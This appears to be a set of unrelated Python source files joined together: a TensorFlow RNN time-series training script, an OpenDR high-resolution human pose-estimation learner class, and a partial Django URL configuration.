return json.dumps({ 'status': 'playing', 'progress': self.progress, 'length': self.length, 'song': self.current.toObj() })
|
import numpy as np
import tensorflow as tf
import pandas as pd
import os
import time
Rootdir = os.path.abspath(os.path.dirname(os.getcwd()))
Modeldir = Rootdir + r"\Models\LSTM\LSTM.model"
Datadir = "E:\PyCharmProjects\MasonicDLv0.1\Database\无证之罪_partI.csv"
Data_Sheet = "Sheet1"
train_step = 8000
# learning_rate = 0.01
learning_rate = tf.train.exponential_decay(
learning_rate=0.1,
global_step=train_step,
decay_steps=100,
decay_rate=0.9,
staircase=True)
regularizer_enabled = False
reg_rate = 0.01
hidden_layer_size = 50
seq_size = 10
test_size = 10
X = tf.placeholder(tf.float32, [None, seq_size, 1])
Y = tf.placeholder(tf.float32, [None, 1])
W = {
'w1': tf.Variable(tf.random_normal([hidden_layer_size, 30])),
'w2': tf.Variable(tf.random_normal([30, 15])),
'w3': tf.Variable(tf.random_normal([15, 1])),
'w4': tf.Variable(tf.random_normal([10, 1])),
"b1": tf.Variable(tf.random_normal([1])),
"b2": tf.Variable(tf.random_normal([1])),
"b3": tf.Variable(tf.random_normal([1])),
"b4": tf.Variable(tf.random_normal([1]))
}
def normal(data):
data = (data - data.min()) / (data.max() - data.min())
return data
def rnn(X, W):
w1, w2, w3, w4 = W['w1'], W['w2'], W['w3'], W['w4']
b1, b2, b3, b4 = tf.expand_dims(W['b1'], axis=0), tf.expand_dims(W['b2'], axis=0), tf.expand_dims(W['b3'], axis=0), \
W['b4']
w1 = tf.tile(input=tf.expand_dims(w1, axis=0), multiples=[tf.shape(X)[0], 1, 1])
w2 = tf.tile(input=tf.expand_dims(w2, axis=0), multiples=[tf.shape(X)[0], 1, 1])
w3 = tf.tile(input=tf.expand_dims(w3, axis=0), multiples=[tf.shape(X)[0], 1, 1])
b1 = tf.tile(input=tf.expand_dims(b1, axis=1), multiples=[tf.shape(X)[0], 1, 1])
b2 = tf.tile(input=tf.expand_dims(b2, axis=1), multiples=[tf.shape(X)[0], 1, 1])
b3 = tf.tile(input=tf.expand_dims(b3, axis=1), multiples=[tf.shape(X)[0], 1, 1])
cell = tf.nn.rnn_cell.BasicRNNCell(hidden_layer_size)
outputs, states = tf.nn.dynamic_rnn(cell, X, dtype=tf.float32)
fc1 = tf.nn.tanh(tf.matmul(outputs, w1) + b1)
# y_[batch_size, seq_size, hidden_layer_size]
fc2 = tf.nn.tanh(tf.matmul(fc1, w2) + b2)
fc3 = tf.nn.tanh(tf.matmul(fc2, w3) + b3)
fc4 = tf.squeeze(fc3)
fc4 = tf.nn.tanh(tf.matmul(fc4, w4) + b4)
return fc4
# def rnn(X, W):
# cell = tf.nn.rnn_cell.BasicLSTMCell(hidden_layer_size)
# outputs, states = tf.nn.dynamic_rnn(cell, X, dtype=tf.float32)
# y_ = tf.nn.tanh(tf.matmul(outputs[-1], W['w1']) + W['b1'])
# y_ = tf.nn.tanh(tf.matmul(y_, W['w2']) + W['b2'])
# y_ = tf.squeeze(y_)
#
# return y_
data = pd.read_csv(Datadir, header=None)
data = data[1]
# data.info()
data = normal(data)
data = np.array(data)
data = data.tolist()
data_size = np.shape(data)[0]
seq, pre = [], []
for i in range(data_size - seq_size - 1):
seq.append(data[i: i + seq_size])
pre.append(data[i + seq_size])
data_size = data_size - seq_size - 1
trX = seq[:data_size - 1 - test_size]
trY = pre[:data_size - 1 - test_size]
teX = seq[data_size - 1 - test_size:data_size - 1]
teY = pre[data_size - test_size:]
trX = np.expand_dims(trX, axis=2)
teX = np.expand_dims(teX, axis=2)
trY = np.expand_dims(trY, axis=1)
teY = np.expand_dims(teY, axis=1)
y_ = rnn(X, W)
if regularizer_enabled:
loss = tf.reduce_mean(tf.square(Y - y_)) + \
tf.contrib.layers.l1_regularizer(reg_rate)(W['w1']) + \
tf.contrib.layers.l1_regularizer(reg_rate)(W['w2']) + \
tf.contrib.layers.l1_regularizer(reg_rate)(W['w3'])
else:
loss = tf.reduce_mean(tf.square(Y - y_))
train_op = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for step in range(train_step):
_, train_loss = sess.run([train_op, loss], feed_dict={X: trX, Y: trY})
if train_loss < 0.0009:
test_loss = sess.run(loss, feed_dict={X: teX, Y: teY})
if test_loss < 0.04:
print(step, train_loss, test_loss)
print(sess.run(y_, feed_dict={X: teX}))
print(teY)
break
if step % 100 == 0:
test_loss = sess.run(loss, feed_dict={X: teX, Y: teY})
print(step, train_loss, test_loss)
if step == train_step - 1:
print(sess.run(y_, feed_dict={X: teX}))
print(teY)
# if step % 1000 == 0:
# print(sess.run(y_, feed_dict={X: teX}))
# print(teY)
|
# Copyright 2020-2023 OpenDR European Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# General imports
import torchvision.transforms
import os
import cv2
import torch
import json
import numpy as np
from tqdm import tqdm
from urllib.request import urlretrieve
# OpenDR engine imports
from opendr.engine.data import Image
from opendr.engine.target import Pose
from opendr.engine.constants import OPENDR_SERVER_URL
# OpenDR lightweight_open_pose imports
from opendr.perception.pose_estimation.lightweight_open_pose.lightweight_open_pose_learner import \
LightweightOpenPoseLearner
from opendr.perception.pose_estimation.lightweight_open_pose.algorithm.modules.load_state import \
load_state
from opendr.perception.pose_estimation.lightweight_open_pose.algorithm.modules.keypoints import \
extract_keypoints, group_keypoints
from opendr.perception.pose_estimation.lightweight_open_pose.algorithm.val import \
convert_to_coco_format, run_coco_eval, normalize, pad_width
class HighResolutionPoseEstimationLearner(LightweightOpenPoseLearner):
def __init__(self, device='cuda', backbone='mobilenet',
temp_path='temp', mobilenet_use_stride=True, mobilenetv2_width=1.0, shufflenet_groups=3,
num_refinement_stages=2, batches_per_iter=1, base_height=256,
first_pass_height=360, second_pass_height=540, percentage_around_crop=0.3, heatmap_threshold=0.1,
experiment_name='default', num_workers=8, weights_only=True, output_name='detections.json',
multiscale=False, scales=None, visualize=False,
img_mean=np.array([128, 128, 128], np.float32), img_scale=np.float32(1 / 256), pad_value=(0, 0, 0),
half_precision=False):
super(HighResolutionPoseEstimationLearner, self).__init__(device=device, backbone=backbone, temp_path=temp_path,
mobilenet_use_stride=mobilenet_use_stride,
mobilenetv2_width=mobilenetv2_width,
shufflenet_groups=shufflenet_groups,
num_refinement_stages=num_refinement_stages,
batches_per_iter=batches_per_iter,
base_height=base_height,
experiment_name=experiment_name,
num_workers=num_workers, weights_only=weights_only,
output_name=output_name, multiscale=multiscale,
scales=scales, visualize=visualize, img_mean=img_mean,
img_scale=img_scale, pad_value=pad_value,
half_precision=half_precision)
self.first_pass_height = first_pass_height
self.second_pass_height = second_pass_height
self.perc = percentage_around_crop
self.threshold = heatmap_threshold
self.xmin = None
self.ymin = None
self.xmax = None
self.ymax = None
self.counter = 0
self.prev_heatmap = np.array([])
def __first_pass(self, img):
"""
This method is generating a rough heatmap of the input image in order to specify the approximate location
of humans in the picture.
:param img: input image for heatmap generation
:type img: numpy.ndarray
:return: returns the Part Affinity Fields (PAFs) of the humans inside the image
:rtype: numpy.ndarray
"""
if 'cuda' in self.device:
tensor_img = torch.from_numpy(img).permute(2, 0, 1).unsqueeze(0).float().cuda()
tensor_img = tensor_img.cuda()
if self.half:
tensor_img = tensor_img.half()
else:
tensor_img = torch.from_numpy(img).permute(2, 0, 1).unsqueeze(0).float().cpu()
stages_output = self.model(tensor_img)
stage2_pafs = stages_output[-1]
pafs = np.transpose(stage2_pafs.squeeze().cpu().data.numpy(), (1, 2, 0))
return pafs
def __second_pass(self, img, net_input_height_size, max_width, stride, upsample_ratio,
pad_value=(0, 0, 0),
img_mean=np.array([128, 128, 128], np.float32), img_scale=np.float32(1 / 256)):
"""
This method detects the keypoints and estimates the pose of humans using the cropped image from the
previous step (__first_pass_).
:param img: input image for heatmap generation
:type img: numpy.ndarray
:param net_input_height_size: the height that the input image will be resized for inference
:type net_input_height_size: int
:param max_width: this parameter is the maximum width that the resized image should have. It is introduced to
avoid cropping images with abnormal ratios e.g (30, 800)
:type max_width: int
:param upsample_ratio: Defines the amount of upsampling to be performed on the heatmaps and PAFs when resizing,
defaults to 4
:type upsample_ratio: int, optional
:returns: the heatmap of human figures, the part affinity filed (pafs), the scale of the resized image compared
to the initial and the pad around the image
:rtype: heatmap, pafs -> numpy.ndarray
scale -> float
pad = -> list
"""
height, width, _ = img.shape
scale = net_input_height_size / height
img_ratio = width / height
if img_ratio > 6:
scale = max_width / width
scaled_img = cv2.resize(img, (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_LINEAR)
scaled_img = normalize(scaled_img, img_mean, img_scale)
min_dims = [net_input_height_size, max(scaled_img.shape[1], net_input_height_size)]
padded_img, pad = pad_width(scaled_img, stride, pad_value, min_dims)
if 'cuda' in self.device:
tensor_img = torch.from_numpy(padded_img).permute(2, 0, 1).unsqueeze(0).float().cuda()
tensor_img = tensor_img.cuda()
if self.half:
tensor_img = tensor_img.half()
else:
tensor_img = torch.from_numpy(padded_img).permute(2, 0, 1).unsqueeze(0).float().cpu()
stages_output = self.model(tensor_img)
stage2_heatmaps = stages_output[-2]
heatmaps = np.transpose(stage2_heatmaps.squeeze().cpu().data.numpy(), (1, 2, 0))
heatmaps = heatmaps.astype(np.float32)
heatmaps = cv2.resize(heatmaps, (0, 0), fx=upsample_ratio, fy=upsample_ratio, interpolation=cv2.INTER_CUBIC)
stage2_pafs = stages_output[-1]
pafs = np.transpose(stage2_pafs.squeeze().cpu().data.numpy(), (1, 2, 0))
pafs = pafs.astype(np.float32)
pafs = cv2.resize(pafs, (0, 0), fx=upsample_ratio, fy=upsample_ratio, interpolation=cv2.INTER_CUBIC)
return heatmaps, pafs, scale, pad
def __pooling(self, img, kernel): # Pooling on input image for dimension reduction
"""This method applies a pooling filter on an input image in order to resize it in a fixed shape
:param img: input image for resizing
:rtype img: engine.data.Image class object
:param kernel: the kernel size of the pooling filter
:type kernel: int
"""
pool_img = torchvision.transforms.ToTensor()(img)
if 'cuda' in self.device:
pool_img = pool_img.cuda()
if self.half:
pool_img = pool_img.half()
pool_img = pool_img.unsqueeze(0)
pool_img = torch.nn.functional.avg_pool2d(pool_img, kernel)
pool_img = pool_img.squeeze(0).permute(1, 2, 0).cpu().float().numpy()
return pool_img
def fit(self, dataset, val_dataset=None, logging_path='', logging_flush_secs=30,
silent=False, verbose=True, epochs=None, use_val_subset=True, val_subset_size=250,
images_folder_name="train2017", annotations_filename="person_keypoints_train2017.json",
val_images_folder_name="val2017", val_annotations_filename="person_keypoints_val2017.json"):
"""This method is not used in this implementation."""
raise NotImplementedError
def optimize(self, do_constant_folding=False):
"""This method is not used in this implementation."""
raise NotImplementedError
def reset(self):
"""This method is not used in this implementation."""
return NotImplementedError
def save(self, path, verbose=False):
"""This method is not used in this implementation."""
return NotImplementedError
def eval(self, dataset, silent=False, verbose=True, use_subset=True, subset_size=250, upsample_ratio=4,
images_folder_name="val2017", annotations_filename="person_keypoints_val2017.json"):
"""
This method is used to evaluate a trained model on an evaluation dataset.
:param dataset: object that holds the evaluation dataset.
:type dataset: ExternalDataset class object or DatasetIterator class object
:param silent: if set to True, disables all printing of evaluation progress reports and other
information to STDOUT, defaults to 'False'
:type silent: bool, optional
:param verbose: if set to True, enables the maximum verbosity, defaults to 'True'
:type verbose: bool, optional
:param use_subset: If set to True, a subset of the validation dataset is created and used in
evaluation, defaults to 'True'
:type use_subset: bool, optional
:param subset_size: Controls the size of the validation subset, defaults to '250'
:type subset_size: int, optional
param upsample_ratio: Defines the amount of upsampling to be performed on the heatmaps and PAFs
when resizing,defaults to 4
:type upsample_ratio: int, optional
:param images_folder_name: Folder name that contains the dataset images. This folder should be contained
in the dataset path provided. Note that this is a folder name, not a path, defaults to 'val2017'
:type images_folder_name: str, optional
:param annotations_filename: Filename of the annotations json file. This file should be contained in the
dataset path provided, defaults to 'person_keypoints_val2017.json'
:type annotations_filename: str, optional
:returns: returns stats regarding evaluation
:rtype: dict
"""
data = super(HighResolutionPoseEstimationLearner, # NOQA
self)._LightweightOpenPoseLearner__prepare_val_dataset(dataset, use_subset=use_subset,
subset_name="val_subset.json",
subset_size=subset_size,
images_folder_default_name=images_folder_name,
annotations_filename=annotations_filename,
verbose=verbose and not silent)
# Model initialization if needed
if self.model is None and self.checkpoint_load_iter != 0:
# No model loaded, initializing new
self.init_model()
# User set checkpoint_load_iter, so they want to load a checkpoint
# Try to find the checkpoint_load_iter checkpoint
checkpoint_name = "checkpoint_iter_" + str(self.checkpoint_load_iter) + ".pth"
checkpoints_folder = os.path.join(self.parent_dir, '{}_checkpoints'.format(self.experiment_name))
full_path = os.path.join(checkpoints_folder, checkpoint_name)
try:
checkpoint = torch.load(full_path, map_location=torch.device(self.device))
except FileNotFoundError as e:
e.strerror = "File " + checkpoint_name + " not found inside checkpoints_folder, " \
"provided checkpoint_load_iter (" + \
str(self.checkpoint_load_iter) + \
") doesn't correspond to a saved checkpoint.\nNo such file or directory."
raise e
if not silent and verbose:
print("Loading checkpoint:", full_path)
load_state(self.model, checkpoint)
elif self.model is None:
raise AttributeError("self.model is None. Please load a model or set checkpoint_load_iter.")
self.model = self.model.eval() # Change model state to evaluation
self.model.to(self.device)
if "cuda" in self.device:
self.model = self.model.to(self.device)
if self.half:
self.model.half()
if self.multiscale:
self.scales = [0.5, 1.0, 1.5, 2.0]
coco_result = []
num_keypoints = Pose.num_kpts
pbar_eval = None
if not silent:
pbar_desc = "Evaluation progress"
pbar_eval = tqdm(desc=pbar_desc, total=len(data), bar_format="{l_bar}%s{bar}{r_bar}" % '\x1b[38;5;231m')
img_height = data[0]['img'].shape[0]
if img_height in (1080, 1440):
offset = 200
elif img_height == 720:
offset = 50
else:
offset = 0
for sample in data:
file_name = sample['file_name']
img = sample['img']
h, w, _ = img.shape
max_width = w
kernel = int(h / self.first_pass_height)
if kernel > 0:
pool_img = self.__pooling(img, kernel)
else:
pool_img = img
# ------- Heatmap Generation -------
avg_pafs = self.__first_pass(pool_img)
avg_pafs = avg_pafs.astype(np.float32)
pafs_map = cv2.blur(avg_pafs, (5, 5))
pafs_map[pafs_map < self.threshold] = 0
heatmap = pafs_map.sum(axis=2)
heatmap = heatmap * 100
heatmap = heatmap.astype(np.uint8)
heatmap = cv2.blur(heatmap, (5, 5))
contours, hierarchy = cv2.findContours(heatmap, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
count = []
coco_keypoints = []
if len(contours) > 0:
for x in contours:
count.append(x)
xdim = []
ydim = []
for j in range(len(count)): # Loop for every human (every contour)
for i in range(len(count[j])):
xdim.append(count[j][i][0][0])
ydim.append(count[j][i][0][1])
h, w, _ = pool_img.shape
xmin = int(np.floor(min(xdim))) * int((w / heatmap.shape[1])) * kernel
xmax = int(np.floor(max(xdim))) * int((w / heatmap.shape[1])) * kernel
ymin = int(np.floor(min(ydim))) * int((h / heatmap.shape[0])) * kernel
ymax = int(np.floor(max(ydim))) * int((h / heatmap.shape[0])) * kernel
extra_pad_x = int(self.perc * (xmax - xmin)) # Adding an extra pad around cropped image
extra_pad_y = int(self.perc * (ymax - ymin))
if xmin - extra_pad_x > 0:
xmin = xmin - extra_pad_x
if xmax + extra_pad_x < img.shape[1]:
xmax = xmax + extra_pad_x
if ymin - extra_pad_y > 0:
ymin = ymin - extra_pad_y
if ymax + extra_pad_y < img.shape[0]:
ymax = ymax + extra_pad_y
if (xmax - xmin) > 40 and (ymax - ymin) > 40:
crop_img = img[ymin:ymax, xmin:xmax]
else:
crop_img = img[offset:img.shape[0], offset:img.shape[1]]
h, w, _ = crop_img.shape
# ------- Second pass of the image, inference for pose estimation -------
avg_heatmaps, avg_pafs, scale, pad = self.__second_pass(crop_img, self.second_pass_height, max_width,
self.stride, upsample_ratio)
total_keypoints_num = 0
all_keypoints_by_type = []
for kpt_idx in range(18):
total_keypoints_num += extract_keypoints(avg_heatmaps[:, :, kpt_idx], all_keypoints_by_type,
total_keypoints_num)
pose_entries, all_keypoints = group_keypoints(all_keypoints_by_type, avg_pafs)
for kpt_id in range(all_keypoints.shape[0]):
all_keypoints[kpt_id, 0] = (all_keypoints[kpt_id, 0] * self.stride / upsample_ratio - pad[1]) / scale
all_keypoints[kpt_id, 1] = (all_keypoints[kpt_id, 1] * self.stride / upsample_ratio - pad[0]) / scale
for i in range(all_keypoints.shape[0]):
for j in range(all_keypoints.shape[1]):
if j == 0: # Adjust offset if needed for evaluation on our HR datasets
all_keypoints[i][j] = round((all_keypoints[i][j] + xmin) - offset)
if j == 1: # Adjust offset if needed for evaluation on our HR datasets
all_keypoints[i][j] = round((all_keypoints[i][j] + ymin) - offset)
current_poses = []
for n in range(len(pose_entries)):
if len(pose_entries[n]) == 0:
continue
pose_keypoints = np.ones((num_keypoints, 2), dtype=np.int32) * -1
for kpt_id in range(num_keypoints):
if pose_entries[n][kpt_id] != -1.0: # keypoint was found
pose_keypoints[kpt_id, 0] = int(all_keypoints[int(pose_entries[n][kpt_id]), 0])
pose_keypoints[kpt_id, 1] = int(all_keypoints[int(pose_entries[n][kpt_id]), 1])
pose = Pose(pose_keypoints, pose_entries[n][18])
current_poses.append(pose)
coco_keypoints, scores = convert_to_coco_format(pose_entries, all_keypoints)
image_id = int(file_name[0:file_name.rfind('.')])
for idx in range(len(coco_keypoints)):
coco_result.append({
'image_id': image_id,
'category_id': 1, # person
'keypoints': coco_keypoints[idx],
'score': scores[idx]
})
if self.visualize:
for keypoints in coco_keypoints:
for idx in range(len(keypoints) // 3):
cv2.circle(img, (int(keypoints[idx * 3] + offset), int(keypoints[idx * 3 + 1]) + offset),
3, (255, 0, 255), -1)
cv2.imshow('keypoints', img)
key = cv2.waitKey()
if key == 27: # esc
return
if not silent:
pbar_eval.update(1)
with open(self.output_name, 'w') as f:
json.dump(coco_result, f, indent=4)
if len(coco_result) != 0:
if use_subset:
result = run_coco_eval(os.path.join(dataset.path, "val_subset.json"),
self.output_name, verbose=not silent)
else:
result = run_coco_eval(os.path.join(dataset.path, annotations_filename),
self.output_name, verbose=not silent)
return {"average_precision": result.stats[0:5], "average_recall": result.stats[5:]}
else:
if not silent and verbose:
print("Evaluation ended with no detections.")
return {"average_precision": [0.0 for _ in range(5)], "average_recall": [0.0 for _ in range(5)]}
def infer(self, img, upsample_ratio=4, stride=8, track=True, smooth=True, multiscale=False):
"""
This method is used to perform pose estimation on an image.
:param img: image to run inference on
:rtype img: engine.data.Image class object
:param upsample_ratio: Defines the amount of upsampling to be performed on the heatmaps and PAFs
when resizing,defaults to 4
:type upsample_ratio: int, optional
:param stride: Defines the stride value for creating a padded image
:type stride: int,optional
:param track: If True, infer propagates poses ids from previous frame results to track poses,
defaults to 'True'
:type track: bool, optional
:param smooth: If True, smoothing is performed on pose keypoints between frames, defaults to 'True'
:type smooth: bool, optional
:param multiscale: Specifies whether evaluation will run in the predefined multiple scales setup or not.
:type multiscale: bool,optional
:return: Returns a list of engine.target.Pose objects, where each holds a pose
and a heatmap that contains human silhouettes of the input image.
If no detections were made returns an empty list for poses and a black frame for heatmap.
:rtype: poses -> list of engine.target.Pose objects
heatmap -> np.array()
"""
current_poses = []
offset = 0
num_keypoints = Pose.num_kpts
if not isinstance(img, Image):
img = Image(img)
# Bring image into the appropriate format for the implementation
img = img.convert(format='channels_last', channel_order='bgr')
h, w, _ = img.shape
max_width = w
xmin, ymin = 0, 0
ymax, xmax, _ = img.shape
if self.counter % 5 == 0:
kernel = int(h / self.first_pass_height)
if kernel > 0:
pool_img = self.__pooling(img, kernel)
else:
pool_img = img
# # ------- Heatmap Generation -------
avg_pafs = self.__first_pass(pool_img)
avg_pafs = avg_pafs.astype(np.float32)
pafs_map = cv2.blur(avg_pafs, (5, 5))
pafs_map[pafs_map < self.threshold] = 0
heatmap = pafs_map.sum(axis=2)
heatmap = heatmap * 100
heatmap = heatmap.astype(np.uint8)
heatmap = cv2.blur(heatmap, (5, 5))
self.prev_heatmap = heatmap
contours, hierarchy = cv2.findContours(heatmap, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
count = []
if len(contours) > 0:
for x in contours:
count.append(x)
xdim = []
ydim = []
for j in range(len(count)): # Loop for every human (every contour)
for i in range(len(count[j])):
xdim.append(count[j][i][0][0])
ydim.append(count[j][i][0][1])
h, w, _ = pool_img.shape
xmin = int(np.floor(min(xdim))) * int((w / heatmap.shape[1])) * kernel
xmax = int(np.floor(max(xdim))) * int((w / heatmap.shape[1])) * kernel
ymin = int(np.floor(min(ydim))) * int((h / heatmap.shape[0])) * kernel
ymax = int(np.floor(max(ydim))) * int((h / heatmap.shape[0])) * kernel
if self.xmin is None:
self.xmin = xmin
self.ymin = ymin
self.xmax = xmax
self.ymax = ymax
else:
a = 0.2
self.xmin = a * xmin + (1 - a) * self.xmin
self.ymin = a * ymin + (1 - a) * self.ymin
self.ymax = a * ymax + (1 - a) * self.ymax
self.xmax = a * xmax + (1 - a) * self.xmax
extra_pad_x = int(self.perc * (self.xmax - self.xmin)) # Adding an extra pad around cropped image
extra_pad_y = int(self.perc * (self.ymax - self.ymin))
if self.xmin - extra_pad_x > 0:
xmin = self.xmin - extra_pad_x
else:
xmin = self.xmin
if self.xmax + extra_pad_x < img.shape[1]:
xmax = self.xmax + extra_pad_x
else:
xmax = self.xmax
if self.ymin - extra_pad_y > 0:
ymin = self.ymin - extra_pad_y
else:
ymin = self.ymin
if self.ymax + extra_pad_y < img.shape[0]:
ymax = self.ymax + extra_pad_y
else:
ymax = self.ymax
if (xmax - xmin) > 40 and (ymax - ymin) > 40:
crop_img = img[int(ymin):int(ymax), int(xmin):int(xmax)]
else:
crop_img = img[offset:img.shape[0], offset:img.shape[1]]
h, w, _ = crop_img.shape
if crop_img.shape[0] < self.second_pass_height:
second_pass_height = crop_img.shape[0]
else:
second_pass_height = self.second_pass_height
# ------- Second pass of the image, inference for pose estimation -------
avg_heatmaps, avg_pafs, scale, pad = self.__second_pass(crop_img, second_pass_height,
max_width, self.stride, upsample_ratio)
total_keypoints_num = 0
all_keypoints_by_type = []
for kpt_idx in range(18):
total_keypoints_num += extract_keypoints(avg_heatmaps[:, :, kpt_idx], all_keypoints_by_type,
total_keypoints_num)
pose_entries, all_keypoints = group_keypoints(all_keypoints_by_type, avg_pafs)
for kpt_id in range(all_keypoints.shape[0]):
all_keypoints[kpt_id, 0] = (all_keypoints[kpt_id, 0] * self.stride / upsample_ratio - pad[
1]) / scale
all_keypoints[kpt_id, 1] = (all_keypoints[kpt_id, 1] * self.stride / upsample_ratio - pad[
0]) / scale
for i in range(all_keypoints.shape[0]):
for j in range(all_keypoints.shape[1]):
if j == 0: # Adjust offset if needed for evaluation on our HR datasets
all_keypoints[i][j] = round((all_keypoints[i][j] + xmin) - offset)
if j == 1: # Adjust offset if needed for evaluation on our HR datasets
all_keypoints[i][j] = round((all_keypoints[i][j] + ymin) - offset)
current_poses = []
for n in range(len(pose_entries)):
if len(pose_entries[n]) == 0:
continue
pose_keypoints = np.ones((num_keypoints, 2), dtype=np.int32) * -1
for kpt_id in range(num_keypoints):
if pose_entries[n][kpt_id] != -1.0: # keypoint was found
pose_keypoints[kpt_id, 0] = int(all_keypoints[int(pose_entries[n][kpt_id]), 0])
pose_keypoints[kpt_id, 1] = int(all_keypoints[int(pose_entries[n][kpt_id]), 1])
if np.count_nonzero(pose_keypoints == -1) < 26:
pose = Pose(pose_keypoints, pose_entries[n][18])
current_poses.append(pose)
else:
if self.xmin is None:
self.xmin = xmin
self.ymin = ymin
self.xmax = xmax
self.ymax = ymax
else:
a = 0.2
self.xmin = a * xmin + (1 - a) * self.xmin
self.ymin = a * ymin + (1 - a) * self.ymin
self.ymax = a * ymax + (1 - a) * self.ymax
self.xmax = a * xmax + (1 - a) * self.xmax
else:
extra_pad_x = int(self.perc * (self.xmax - self.xmin)) # Adding an extra pad around cropped image
extra_pad_y = int(self.perc * (self.ymax - self.ymin))
if self.xmin - extra_pad_x > 0:
xmin = self.xmin - extra_pad_x
else:
xmin = self.xmin
if self.xmax + extra_pad_x < img.shape[1]:
xmax = self.xmax + extra_pad_x
else:
xmax = self.xmax
if self.ymin - extra_pad_y > 0:
ymin = self.ymin - extra_pad_y
else:
ymin = self.ymin
if self.ymax + extra_pad_y < img.shape[0]:
ymax = self.ymax + extra_pad_y
else:
ymax = self.ymax
if (xmax - xmin) > 40 and (ymax - ymin) > 40:
crop_img = img[int(ymin):int(ymax), int(xmin):int(xmax)]
else:
crop_img = img[offset:img.shape[0], offset:img.shape[1]]
h, w, _ = crop_img.shape
if crop_img.shape[0] < self.second_pass_height:
second_pass_height = crop_img.shape[0]
else:
second_pass_height = self.second_pass_height
# ------- Second pass of the image, inference for pose estimation -------
avg_heatmaps, avg_pafs, scale, pad = self.__second_pass(crop_img, second_pass_height,
max_width, self.stride, upsample_ratio)
total_keypoints_num = 0
all_keypoints_by_type = []
for kpt_idx in range(18):
total_keypoints_num += extract_keypoints(avg_heatmaps[:, :, kpt_idx], all_keypoints_by_type,
total_keypoints_num)
pose_entries, all_keypoints = group_keypoints(all_keypoints_by_type, avg_pafs)
for kpt_id in range(all_keypoints.shape[0]):
all_keypoints[kpt_id, 0] = (all_keypoints[kpt_id, 0] * self.stride / upsample_ratio - pad[1]) / scale
all_keypoints[kpt_id, 1] = (all_keypoints[kpt_id, 1] * self.stride / upsample_ratio - pad[0]) / scale
for i in range(all_keypoints.shape[0]):
for j in range(all_keypoints.shape[1]):
if j == 0: # Adjust offset if needed for evaluation on our HR datasets
all_keypoints[i][j] = round((all_keypoints[i][j] + xmin) - offset)
if j == 1: # Adjust offset if needed for evaluation on our HR datasets
all_keypoints[i][j] = round((all_keypoints[i][j] + ymin) - offset)
current_poses = []
for n in range(len(pose_entries)):
if len(pose_entries[n]) == 0:
continue
pose_keypoints = np.ones((num_keypoints, 2), dtype=np.int32) * -1
for kpt_id in range(num_keypoints):
if pose_entries[n][kpt_id] != -1.0: # keypoint was found
pose_keypoints[kpt_id, 0] = int(all_keypoints[int(pose_entries[n][kpt_id]), 0])
pose_keypoints[kpt_id, 1] = int(all_keypoints[int(pose_entries[n][kpt_id]), 1])
if np.count_nonzero(pose_keypoints == -1) < 26:
pose = Pose(pose_keypoints, pose_entries[n][18])
current_poses.append(pose)
if np.any(self.prev_heatmap) is False:
heatmap = np.zeros((int(img.shape[0] / (int((img.shape[0] / self.first_pass_height))) / 8),
int(img.shape[1] / (int((img.shape[0] / self.first_pass_height))) / 8)),
dtype=np.uint8)
else:
heatmap = self.prev_heatmap
self.counter += 1
return current_poses, heatmap
def download(self, path=None, mode="pretrained", verbose=False,
url=OPENDR_SERVER_URL + "perception/pose_estimation/lightweight_open_pose/",
image_resolution=1080):
"""
Download utility for various Lightweight Open Pose components. Downloads files depending on mode and
saves them in the path provided. It supports downloading:
1) the default mobilenet pretrained model
2) mobilenet, mobilenetv2 and shufflenet weights needed for training
3) a test dataset with a single COCO image and its annotation
:param path: Local path to save the files, defaults to self.temp_path if None
:type path: str, path, optional
:param mode: What file to download, can be one of "pretrained", "weights", "test_data", defaults to "pretrained"
:type mode: str, optional
:param verbose: Whether to print messages in the console, defaults to False
:type verbose: bool, optional
:param url: URL of the FTP server, defaults to OpenDR FTP URL
:type url: str, optional
:param image_resolution: Resolution of the test images to download
:type image_resolution: int, optional
"""
valid_modes = ["weights", "pretrained", "test_data"]
if mode not in valid_modes:
raise UserWarning("mode parameter not valid:", mode, ", file should be one of:", valid_modes)
if path is None:
path = self.temp_path
if not os.path.exists(path):
os.makedirs(path)
if mode in ("pretrained", "weights"):
super(HighResolutionPoseEstimationLearner, self).download(path=path, mode=mode, verbose=verbose, url=url)
elif mode == "test_data":
if verbose:
print("Downloading test data...")
if not os.path.exists(os.path.join(self.temp_path, "dataset")):
os.makedirs(os.path.join(self.temp_path, "dataset"))
if not os.path.exists(os.path.join(self.temp_path, "dataset", "image")):
os.makedirs(os.path.join(self.temp_path, "dataset", "image"))
# Path for high resolution data
url = OPENDR_SERVER_URL + "perception/pose_estimation/high_resolution_pose_estimation/"
# Download annotation file
file_url = os.path.join(url, "dataset", "annotation.json")
urlretrieve(file_url, os.path.join(self.temp_path, "dataset", "annotation.json"))
# Download test image
if image_resolution in (1080, 1440):
file_url = os.path.join(url, "dataset", "image", "000000000785_" + str(image_resolution) + ".jpg")
urlretrieve(file_url, os.path.join(self.temp_path, "dataset", "image", "000000000785_1080.jpg"))
else:
raise UserWarning("There are no data for this image resolution (only 1080 and 1440 are supported).")
if verbose:
print("Test data download complete.")
|
from django.conf.urls import patterns, include, url
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = patterns('',
(r'^$', 'info.views.index'),
(r'^about/$', 'info.views.about'),
(r'^instructions/$', 'info.views.instructions'),
(r'^team/$', 'info.views.team'),
(r'^usingmuni/$', 'info.views.new_to_muni'),
(r'^signup/$', 'info.views.signup'),
(r'^survey/$', 'info.views.survey'),
(r'^contact/$', 'info.views.contact'),
(r'^install_instructions/$', 'info.views.install'),
(r'^participation_instructions/$', 'info.views.participation'),
(r'^widget_instructions/$', 'info.views.widget'),
# Examples:
# url(r'^$', 'SF_Traveler.views.home', name='home'),
# url(r'^SF_Traveler/', include('SF_Traveler.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
